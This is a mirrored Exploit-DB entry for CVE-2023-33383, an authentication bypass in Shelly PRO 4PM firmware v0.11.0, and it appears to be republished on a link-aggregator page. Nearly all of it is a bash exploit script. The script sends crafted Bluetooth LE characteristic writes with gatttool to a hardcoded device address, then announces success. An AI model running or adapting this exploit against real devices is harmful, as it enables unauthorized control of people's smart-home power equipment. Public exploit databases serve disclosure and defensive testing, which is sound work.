1

[remote] Shelly PRO 4PM v0.11.0 - Authentication Bypass

 9 months ago
source link: https://www.exploit-db.com/exploits/51657
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Shelly PRO 4PM v0.11.0 - Authentication Bypass

EDB-ID:

51657

EDB Verified:

Platform:

Hardware

Date:

2023-08-04

Vulnerable App:

#!/bin/bash

# Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass
# Google Dork: NA
# Date: 2nd August 2023
# Exploit Author: The Security Team [exploitsecurity.io]
# Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability
# Vendor Homepage: https://www.shelly.com/
# Software Link: NA
# Version: Firmware v0.11.0 (REQUIRED)
# Tested on: MacOS/Linux
# CVE : CVE-2023-33383

IFS=
failed=$false
RED="\e[31m"
GREEN="\e[92m"
WHITE="\e[97m"
ENDCOLOR="\e[0m"
substring="Connection refused"


banner()
    {
        clear
        echo -e "${GREEN}[+]*********************************************************[+]"
        echo -e "${GREEN}|   Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}]              |"
        echo -e "${GREEN}|   Description: Shelly PRO 4PM - Out of Bounds              |"
        echo -e "${GREEN}|   CVE: CVE-2023-33383                                      |"
        echo -e "${GREEN}[+]*********************************************************[+]"
        echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"
    }

banner
read -s -n 1 key
if [ "$key" = "x" ]; then
    exit 0;
elif [ "$key" = "" ]; then
    gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)
    if [ -z "$gattout" ]; then
        echo -e "${RED}Connection timed out${ENDCOLOR}"
        exit 0;
    else
    sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1
    echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
    sleep 1
    if [ $? -eq 1 ]; then
       $failed=$true
       exit 0;
    fi
    sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1
    sleep 1
    if [ $? -eq 1 ]; then
        $failed=$true
        echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
        exit 0;
    else
       sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1
       sleep 1
       for i in {1..5}
       do
          echo -ne "${GREEN}."
          sleep 1
       done
       echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"
    fi
fi
fi

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK